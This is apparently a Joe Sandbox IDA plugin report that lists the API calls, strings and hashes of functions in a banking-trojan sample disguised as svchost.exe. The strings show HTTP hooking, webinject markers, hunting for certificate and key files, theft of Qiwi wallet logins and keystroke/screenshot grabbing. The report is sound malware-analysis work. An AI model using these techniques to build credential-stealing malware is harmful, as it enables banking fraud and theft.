Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
String ID: 00-->$<Actions $p=Dv
API String ID: 3028510665-2653830224
Opcode ID: 955b91e7d97598c02b1fd98b2500fdb02c6b2481e78ce23fabddc674594c4510
Instruction ID: 60e659956de6826fb5c9e3504b81639812d481b549725b71a5a6ffd7b5f9c5d4
Opcode Fuzzy Hash: 955b91e7d97598c02b1fd98b2500fdb02c6b2481e78ce23fabddc674594c4510
Instruction Fuzzy Hash: CBA1CEB2504311ABC720DF64CC48F5B7BA8EFC8751F048669FA45EB291D774EA04CBA8

Function 02C8EB60 Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 215COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C8EB7E
PathAddBackslashA.SHLWAPI(82C319E5), ref: 02C8EBAB
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8EBED
GetLastError.KERNEL32 ref: 02C8EBF3
IsUserAnAdmin.SHELL32 ref: 02C8EBFB
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8EC0C
SetLastError.KERNEL32(00000000), ref: 02C8EC13
PathAddBackslashA.SHLWAPI(82C319E5,?,?), ref: 02C8EC87
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02C8ECC5

Strings

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}, xrefs: 02C8ED5D
path.txt, xrefs: 02C8EC28
P0#v, xrefs: 02C8ED7E
82C319E5, xrefs: 02C8EBA6, 02C8EBB1, 02C8EC82, 02C8EC8D

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashCreateDirectoryErrorLast$AdminFolderMakeSystemUsermemset
String ID: 82C319E5$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}$P0#v$path.txt
API String ID: 2217318736-1799520723
Opcode ID: 51d1b8c9fa17c033bec282f951e1662f180fe039207c4c48e6daccd246365cc4
Instruction ID: 2ed45fa89f3537049a4328ad7dd3c48984d289ba92d9bddbc3343abe1d9e4ec7
Opcode Fuzzy Hash: 51d1b8c9fa17c033bec282f951e1662f180fe039207c4c48e6daccd246365cc4
Instruction Fuzzy Hash: F57127319006955FDB129B349C58BEB7BE8AF85308F14CA95FD86CB241EB70DA49CB90

Function 02C842C0 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 182memorysleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 02C832F0: IsUserAnAdmin.SHELL32 ref: 02C832FA
Part of subcall function 02C832F0: memset.MSVCRT ref: 02C83330
Part of subcall function 02C832F0: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 02C83357
Part of subcall function 02C832F0: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 02C8337A
Part of subcall function 02C832F0: GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 02C833ED
Part of subcall function 02C832F0: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02C833F4
Part of subcall function 02C832F0: memset.MSVCRT ref: 02C83404

GetTickCount.KERNEL32 ref: 02C842E1
_snprintf.MSVCRT ref: 02C842F6

Part of subcall function 02C83D90: IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
Part of subcall function 02C83D90: IsUserAnAdmin.SHELL32 ref: 02C83DB1
Part of subcall function 02C83D90: DnsFlushResolverCache.DNSAPI ref: 02C83DBB
Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83DD8
Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83E3C
Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75

Sleep.KERNEL32(000001F4), ref: 02C84315
GetTempPathA.KERNEL32(00000104,?), ref: 02C8432C
GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02C84344
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C843AC
HeapValidate.KERNEL32(00000000), ref: 02C843AF
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C843BC
HeapFree.KERNEL32(00000000), ref: 02C843BF
RtlImageNtHeader.NTDLL(00000000), ref: 02C8440E
TerminateThread.KERNEL32(00000338,00000000), ref: 02C84438

Strings

C:\Windows\apppatch\svchost.exe, xrefs: 02C8441C, 02C84440, 02C84455, 02C84460, 02C84476
7D2DE7E1a, xrefs: 02C842C9
id=1&post=%u, xrefs: 02C842E8

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$memset$Process$AdminCheckConnectionInternetTempUserlstrcpyn$AliveAllocCacheCountFileFlushFreeHeaderImageNameNetworkOpenPathQueryResolverSleepTerminateThreadTickValidateValue_snprintf
String ID: 7D2DE7E1a$C:\Windows\apppatch\svchost.exe$id=1&post=%u
API String ID: 3337567932-2551706555
Opcode ID: 2ab172c36b168154a7e170d85e073d0d48a99f091999c4e4c8f498f21415e0a2
Instruction ID: bbd2204ae303518fbca62e2b7ffa70cbcb0041e8f9508d5356b3ba8fd619da67
Opcode Fuzzy Hash: 2ab172c36b168154a7e170d85e073d0d48a99f091999c4e4c8f498f21415e0a2
Instruction Fuzzy Hash: F4513B71E802466BE735ABB0AC49FBA7B6DDF84B08F048694F609D71C1EB70D504CB60

Function 02C800B0 Relevance: 45.6, APIs: 14, Strings: 12, Instructions: 137libraryloadermemoryCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(Crypt32.dll,00000000,00000000,7622F550,00000000), ref: 02C800CE
GetProcAddress.KERNEL32(00000000,CertVerifyCertificateChainPolicy), ref: 02C800E4
VirtualProtect.KERNEL32(00000000,00000006,00000040,?,76231620), ref: 02C800FC
VirtualProtect.KERNEL32(00000000,00000006,?,?), ref: 02C8011E
LoadLibraryExA.KERNEL32(Wininet.dll,00000000,00000000), ref: 02C8012A
GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 02C80140
GetProcAddress.KERNEL32(00000000,HttpSendRequestW), ref: 02C8015C
GetProcAddress.KERNEL32(00000000,HttpSendRequestExA), ref: 02C80178
GetProcAddress.KERNEL32(00000000,HttpSendRequestExW), ref: 02C80194
GetProcAddress.KERNEL32(00000000,InternetQueryDataAvailable), ref: 02C801B0
GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 02C801CC
GetProcAddress.KERNEL32(00000000,InternetReadFileExA), ref: 02C801E8
GetProcAddress.KERNEL32(00000000,InternetReadFileExW), ref: 02C80204
GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 02C80220

Strings

Wininet.dll, xrefs: 02C80125
HttpSendRequestExW, xrefs: 02C8018E
HttpSendRequestExA, xrefs: 02C80172
InternetReadFile, xrefs: 02C801C6
InternetReadFileExW, xrefs: 02C801FE
Crypt32.dll, xrefs: 02C800BC
CertVerifyCertificateChainPolicy, xrefs: 02C800DE
InternetCloseHandle, xrefs: 02C8021A
InternetQueryDataAvailable, xrefs: 02C801AA
HttpSendRequestA, xrefs: 02C8013A
HttpSendRequestW, xrefs: 02C80156
InternetReadFileExA, xrefs: 02C801E2

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoadProtectVirtual
String ID: CertVerifyCertificateChainPolicy$Crypt32.dll$HttpSendRequestA$HttpSendRequestExA$HttpSendRequestExW$HttpSendRequestW$InternetCloseHandle$InternetQueryDataAvailable$InternetReadFile$InternetReadFileExA$InternetReadFileExW$Wininet.dll
API String ID: 1705253364-835984666
Opcode ID: 0ea05016a823ce1192b41bd76d47603c3c2e7eb29b6b33b6f0fb218726745ecd
Instruction ID: d3d08d81a9f4b24674397dfb42814877a6d3e56e70194442aa7d9c041c26f86b
Opcode Fuzzy Hash: 0ea05016a823ce1192b41bd76d47603c3c2e7eb29b6b33b6f0fb218726745ecd
Instruction Fuzzy Hash: 9931C771BC031A35FA2276744C46FAF975E4F85F99F018534B803B2445DBA6E70989B8

Function 02C8DA40 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 217filethreadCOMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(?,prv_key.pfx), ref: 02C8DA6D
PathAddBackslashA.SHLWAPI(82C31967), ref: 02C8DAAE
PathAddBackslashA.SHLWAPI(82C31967), ref: 02C8DAE2
CreateDirectoryA.KERNEL32(?,00000000,82C31967), ref: 02C8DAF7
GetLastError.KERNEL32 ref: 02C8DB01
IsUserAnAdmin.SHELL32 ref: 02C8DB09
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8DB1A
SetLastError.KERNEL32(00000000), ref: 02C8DB21
SetFileAttributesA.KERNEL32(?,00000000), ref: 02C8DB5B
DeleteFileA.KERNEL32(?), ref: 02C8DB68
PathAddBackslashA.SHLWAPI(82C31967,02CBDAD8,02CBDAD9), ref: 02C8DBA9
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8DBE4
GetLastError.KERNEL32 ref: 02C8DBEE
IsUserAnAdmin.SHELL32 ref: 02C8DBF6
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8DC07
SetLastError.KERNEL32(00000000), ref: 02C8DC0E
SetFileAttributesA.KERNEL32(?,00000000), ref: 02C8DC4B
DeleteFileA.KERNEL32(?), ref: 02C8DC58
CreateThread.KERNEL32(00000000,00000000,02C8DE40,02CBDAD8,00000000,00000000), ref: 02C8DC8E
GetHandleInformation.KERNEL32(00000000,?), ref: 02C8DCA6
CloseHandle.KERNEL32(00000000), ref: 02C8DCB7

Strings

prv_key.pfx, xrefs: 02C8DA67
path.txt, xrefs: 02C8DB38
pass.log, xrefs: 02C8DC28
82C31967, xrefs: 02C8DAA9, 02C8DAB0, 02C8DADB, 02C8DAE4, 02C8DBA4, 02C8DBAB

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Path$ErrorFileLast$BackslashCreate$AdminAttributesDeleteDirectoryFolderHandleMakeSystemUser$CloseInformationThread
String ID: 82C31967$pass.log$path.txt$prv_key.pfx
API String ID: 448721894-3876320564
Opcode ID: 400d5898fa59baa4187225590c2ebc197c0e41cae4a2fb2c7564df7c8e919a4f
Instruction ID: 8815aab9caae678beb954c7b7f2384fd36a2e34a63283f0a9db963741f17374a
Opcode Fuzzy Hash: 400d5898fa59baa4187225590c2ebc197c0e41cae4a2fb2c7564df7c8e919a4f
Instruction Fuzzy Hash: 24712871A406955FD7129F389C58BEABBE8EF85305F14C6D4E98BC7240DB70CA49CB90

Function 00402F30 Relevance: 35.4, APIs: 18, Strings: 2, Instructions: 436commemoryCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000,?,?,76D6DB30), ref: 00402F40
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00402F60
CoCreateInstance.OLE32(004043F0,00000000,00000001,004041E0,?), ref: 00402F87
VariantInit.OLEAUT32(?), ref: 00402F9F
VariantInit.OLEAUT32(?), ref: 00402FBA
VariantInit.OLEAUT32(?), ref: 00402FD8
VariantInit.OLEAUT32(?), ref: 00402FF6
VariantClear.OLEAUT32(?), ref: 0040307C
CreateFileMappingW.KERNEL32(?), ref: 00403082
VariantClear.OLEAUT32(?), ref: 00403088
VariantClear.OLEAUT32(?), ref: 0040308E
InterlockedDecrement.KERNEL32(004035B6), ref: 004030CD
SysAllocString.OLEAUT32(00404EEC), ref: 00403276
VariantInit.OLEAUT32(?), ref: 0040329B
VariantInit.OLEAUT32(?), ref: 004032B9

Part of subcall function 00402E50: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004030A1,00404ED8), ref: 00402E58
Part of subcall function 00402E50: HeapAlloc.KERNEL32(00000000,?,004030A1,00404ED8), ref: 00402E5F
Part of subcall function 00402E50: SysAllocString.OLEAUT32(004030A1), ref: 00402E80

VariantClear.OLEAUT32(?), ref: 00403366
VariantClear.OLEAUT32(?), ref: 0040336C
VariantClear.OLEAUT32(?), ref: 00403372

Strings

p=Dv, xrefs: 00402F95, 00403282
cmd.exe, xrefs: 004031D1

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit$Alloc$CreateHeapInitializeString$DecrementFileInstanceInterlockedMappingProcessSecurity
String ID: cmd.exe$p=Dv
API String ID: 3029307448-1819144570
Opcode ID: ce624a195721d34df8c0ff0fb2f0b689a1a1700c9ed8d61842eb4ad22ab92356
Instruction ID: 9e23888bed06d8ec6237e29dc82f696ab5e76098d001fcea0e973b2596c5eb93
Opcode Fuzzy Hash: ce624a195721d34df8c0ff0fb2f0b689a1a1700c9ed8d61842eb4ad22ab92356
Instruction Fuzzy Hash: 64F10875E002199FCB00DFA8C884A9EBBB9FF88710F1581AAE914BB351D774AD01CF94

Function 02C71000 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 156memorythreadCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,02C7149C,00000000,?), ref: 02C7101B
GetProcessHeap.KERNEL32(00000008,00000013,7622F570,?,02C7149C,00000000,?), ref: 02C7103E
HeapAlloc.KERNEL32(00000000,?,02C7149C,00000000,?), ref: 02C71045
memset.MSVCRT ref: 02C71055
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,7622F570,?,02C7149C,00000000,?), ref: 02C71073
StrStrIA.SHLWAPI(00000000,name.key,00000000,?,02C7149C,00000000,?), ref: 02C71093
CreateThread.KERNEL32(00000000,00000000,02C906E0,00000000,00000000,00000000), ref: 02C710A3
CreateThread.KERNEL32(00000000,00000000,02C8F1B0,00000000,00000000,00000000), ref: 02C710D0
StrStrIA.SHLWAPI(00000000,\secrets.key,?,?,02C7149C,00000000,?), ref: 02C710EC
StrStrIA.SHLWAPI(00000000,sign.key,?,02C7149C,00000000,?), ref: 02C71102
CreateThread.KERNEL32(00000000,00000000,02C911C0,00000000,00000000,00000000), ref: 02C7111B
GetHandleInformation.KERNEL32(00000000,?,?,02C7149C,00000000,?), ref: 02C7112F
CloseHandle.KERNEL32(00000000,?,02C7149C,00000000,?), ref: 02C71140
GetProcessHeap.KERNEL32(00000000,00000000,?,02C7149C,00000000,?), ref: 02C71155
HeapValidate.KERNEL32(00000000,?,02C7149C,00000000,?), ref: 02C71158
GetProcessHeap.KERNEL32(00000000,00000000,?,02C7149C,00000000,?), ref: 02C71164
HeapFree.KERNEL32(00000000,?,02C7149C,00000000,?), ref: 02C71167

Strings

name.key, xrefs: 02C7108D
sign.key, xrefs: 02C710FC
\secrets.key, xrefs: 02C710E6

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$CreateProcessThread$ByteCharHandleMultiWide$AllocCloseFreeInformationValidatememset
String ID: \secrets.key$name.key$sign.key
API String ID: 3254303593-2345338882
Opcode ID: 280a4b6dda162144de4f81a873db4c6609517df138f10e60873049e03207b4b4
Instruction ID: 4ba0e2f269905619e1da183914577106412ee6c3aa111e834bdfd4dedbef0bba
Opcode Fuzzy Hash: 280a4b6dda162144de4f81a873db4c6609517df138f10e60873049e03207b4b4
Instruction Fuzzy Hash: A741E731A401A17B9B326A665C8CEAB7B7CDFC6F94F088719F919A7040DB71C611C6B0

Function 02C903A0 Relevance: 35.1, APIs: 14, Strings: 6, Instructions: 129stringthreadCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 02C903E9
strstr.MSVCRT ref: 02C903FC
strstr.MSVCRT ref: 02C9040F
PathAddBackslashA.SHLWAPI(82C31B11), ref: 02C9043D
PathAddBackslashA.SHLWAPI(82C31B11), ref: 02C90473
CreateDirectoryA.KERNEL32(?,00000000,82C31B11), ref: 02C90488
GetLastError.KERNEL32 ref: 02C90492
IsUserAnAdmin.SHELL32 ref: 02C9049A
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C904AB
SetLastError.KERNEL32(00000000), ref: 02C904B2
SetCurrentDirectoryA.KERNEL32(?), ref: 02C904BF
CreateThread.KERNEL32(00000000,00000000,02C90540,00000000,00000000,00000000), ref: 02C90508
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C90520
CloseHandle.KERNEL32(00000000), ref: 02C90531

Strings

82C31B11, xrefs: 02C90438, 02C9043F, 02C9046C, 02C90475
phone=, xrefs: 02C903F6
w.qiwi.ru, xrefs: 02C903E3
pass.txt, xrefs: 02C904DB
password=, xrefs: 02C90409
GET , xrefs: 02C903C4

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Pathstrstr$BackslashCreateDirectoryErrorHandleLast$AdminCloseCurrentFolderInformationMakeSystemThreadUser
String ID: 82C31B11$GET $pass.txt$password=$phone=$w.qiwi.ru
API String ID: 554474407-2858001473
Opcode ID: edd3454b842262869fdc0c67ea75b0bb88a63f68ee895313ac0426a4e152f567
Instruction ID: 2a174f549657d50b6b9ead6a098b81d6fee8c9a1354c359d70f9939a41d377c1
Opcode Fuzzy Hash: edd3454b842262869fdc0c67ea75b0bb88a63f68ee895313ac0426a4e152f567
Instruction Fuzzy Hash: AD415931E4025D9BEF218E34AC5CBEB7BACAF81705F244698F88597140EB70D685CB95

Function 02C8FA10 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 192memoryfilestringCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(82C31B07,?,7693BF00), ref: 02C8FA40
CreateDirectoryA.KERNEL32(?,00000000,?,7693BF00), ref: 02C8FA81
GetLastError.KERNEL32(?,7693BF00), ref: 02C8FA8B
IsUserAnAdmin.SHELL32 ref: 02C8FA93
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8FAA4
SetLastError.KERNEL32(00000000,?,7693BF00), ref: 02C8FAAB
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,7693BF00), ref: 02C8FAEA
GetFileAttributesA.KERNEL32(?,?,7693BF00), ref: 02C8FAF7
SetCurrentDirectoryA.KERNEL32(?,?,7693BF00), ref: 02C8FB40
VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,7693BF00), ref: 02C8FB5C
lstrcpynA.KERNEL32(00000000,?,00000104,?,7693BF00), ref: 02C8FB79

Part of subcall function 02C97B50: GetProcessHeap.KERNEL32(00000008,00004070,?,00000000,75AF5CE0,?,02C82840,?), ref: 02C97B63
Part of subcall function 02C97B50: RtlAllocateHeap.NTDLL(00000000,?,02C82840,?), ref: 02C97B66
Part of subcall function 02C97B50: memset.MSVCRT ref: 02C97B7B
Part of subcall function 02C97B50: CreateFileA.KERNEL32(02C82840,40000000,00000003,00000000,00000002,00000080,00000000,?,02C82840,?), ref: 02C97BD2
Part of subcall function 02C97B50: GetProcessHeap.KERNEL32(00000000,00000000,?,02C82840,?), ref: 02C97BF5
Part of subcall function 02C97B50: HeapValidate.KERNEL32(00000000,?,02C82840,?), ref: 02C97BF8
Part of subcall function 02C97B50: GetProcessHeap.KERNEL32(00000000,00000000,?,02C82840,?), ref: 02C97C04
Part of subcall function 02C97B50: HeapFree.KERNEL32(00000000,?,02C82840,?), ref: 02C97C07

VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,7693BF00), ref: 02C8FBA8
PathAddBackslashA.SHLWAPI(82C31B07,?,7693BF00), ref: 02C8FBC7
SetFileAttributesA.KERNEL32(?,00000000,?,7693BF00), ref: 02C8FC2B
DeleteFileA.KERNEL32(?,?,7693BF00), ref: 02C8FC38

Part of subcall function 02C97CE0: LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,75AF5CE0), ref: 02C97D61
Part of subcall function 02C97CE0: _snprintf.MSVCRT ref: 02C97D7D
Part of subcall function 02C97CE0: FindFirstFileA.KERNEL32(00000000,?), ref: 02C97D8C
Part of subcall function 02C97CE0: LocalFree.KERNEL32(00000000), ref: 02C97D99
Part of subcall function 02C97CE0: wsprintfA.USER32 ref: 02C97DD8
Part of subcall function 02C97CE0: wsprintfA.USER32 ref: 02C97DE6

Strings

path.txt, xrefs: 02C8FC08
inter.zip, xrefs: 02C8FAC0
\, xrefs: 02C8FB19
82C31B07, xrefs: 02C8FA3B, 02C8FA42, 02C8FBC2, 02C8FBC9

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: FileHeap$FreePathProcess$AllocAttributesBackslashCreateDirectoryErrorLastLocalVirtualwsprintf$AdminAllocateCurrentDeleteFindFirstFolderMakeModuleNameSystemUserValidate_snprintflstrcpynmemset
String ID: 82C31B07$\$inter.zip$path.txt
API String ID: 3271220685-1717531035
Opcode ID: 2cffffbe691cc65060450dcf91376301718293bd22c808996af54d038fe893d7
Instruction ID: 9bb7c9631274bbb94ac3368ab62ddaff185e6de9522194c02445509fab95a5b1
Opcode Fuzzy Hash: 2cffffbe691cc65060450dcf91376301718293bd22c808996af54d038fe893d7
Instruction Fuzzy Hash: 036178309406855FDB22DB249CA8BFBBBE9AF85304F5086D8E989D7150DB70DA89CB50

Function 02C811D0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 02C81130: memset.MSVCRT ref: 02C81152
Part of subcall function 02C81130: GetParent.USER32(?), ref: 02C8115E
Part of subcall function 02C81130: GetWindowTextW.USER32(00000000,?,00000104), ref: 02C81175
Part of subcall function 02C81130: StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 02C81196

EnterCriticalSection.KERNEL32(02CBD858,?,?), ref: 02C81206
PathAddBackslashA.SHLWAPI(?,?,00000000), ref: 02C81234
PathAppendA.SHLWAPI(?,?), ref: 02C81248
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C81259
GetLastError.KERNEL32 ref: 02C8125F
IsUserAnAdmin.SHELL32 ref: 02C81268
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C81279
SetLastError.KERNEL32(?), ref: 02C81283
PathAppendA.SHLWAPI(?,keygrab), ref: 02C81295
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C812A0
GetLastError.KERNEL32 ref: 02C812A6
IsUserAnAdmin.SHELL32 ref: 02C812AE
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C812BF
SetLastError.KERNEL32(00000000), ref: 02C812C6
PathAddBackslashA.SHLWAPI(?), ref: 02C812D3
_snprintf.MSVCRT ref: 02C81303
LeaveCriticalSection.KERNEL32(02CBD858,?), ref: 02C81323

Strings

%02u.bmp, xrefs: 02C812F1
keygrab, xrefs: 02C81289

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Path$ErrorLast$AdminAppendBackslashCreateCriticalDirectoryFolderMakeSectionSystemUser$EnterLeaveParentTextWindow_snprintfmemset
String ID: %02u.bmp$keygrab
API String ID: 2122597915-4222822809
Opcode ID: b9a95635331556032df9da3cc206f789a13c51217be5fcd1ae6ffc336ec44d82
Instruction ID: f38ad4d4ce2a83df3e94e43d01db13399269dc43d253f1200e0522f9340ea6d4
Opcode Fuzzy Hash: b9a95635331556032df9da3cc206f789a13c51217be5fcd1ae6ffc336ec44d82
Instruction Fuzzy Hash: 9531C2759402599BDB11EBB4DC48BDA77BCEF88305F088A94E589C3000DFB0DA96CF90

Function 02C80240 Relevance: 31.8, APIs: 16, Strings: 5, Instructions: 275memorystringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(02CBD840,00000000,00000000,75C39E60,?,02C808CE,?,?,?,?,?,?,02C84818), ref: 02C80250
GetProcessHeap.KERNEL32(00000008,00000020,?,02C808CE,?,?,?,?,?,?,02C84818), ref: 02C802B8
HeapAlloc.KERNEL32(00000000,?,02C808CE,?,?,?,?,?,?,02C84818), ref: 02C802BF
strstr.MSVCRT ref: 02C8033F
strstr.MSVCRT ref: 02C80359
strstr.MSVCRT ref: 02C80373
strstr.MSVCRT ref: 02C8038D
strstr.MSVCRT ref: 02C803B7
GetProcessHeap.KERNEL32(00000008,00000020), ref: 02C803D4
HeapAlloc.KERNEL32(00000000), ref: 02C803DB
strstr.MSVCRT ref: 02C80504
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8053C
HeapValidate.KERNEL32(00000000), ref: 02C8053F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8054C
HeapFree.KERNEL32(00000000), ref: 02C8054F
LeaveCriticalSection.KERNEL32(02CBD840,?,02C808CE,?,?,?,?,?,?,02C84818), ref: 02C8055A

Strings

set_url , xrefs: 02C802E3
data_after, xrefs: 02C8049E
data_inject, xrefs: 02C8044E
data_before, xrefs: 02C803B1, 02C80404, 02C804F6
data_end, xrefs: 02C80409, 02C80453, 02C804A3

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$strstr$Process$AllocCriticalSection$EnterFreeLeaveValidate
String ID: data_after$data_before$data_end$data_inject$set_url
API String ID: 2387113551-2328515424
Opcode ID: c16699b97f3a54a12fc46ee5ca0b546e22a85f7000ea06cbc45ceb26d375bcf5
Instruction ID: 862d923f2d4cfc4ddbe5a02576eeefa2444832840683b132483696eb5dc3c8e8
Opcode Fuzzy Hash: c16699b97f3a54a12fc46ee5ca0b546e22a85f7000ea06cbc45ceb26d375bcf5
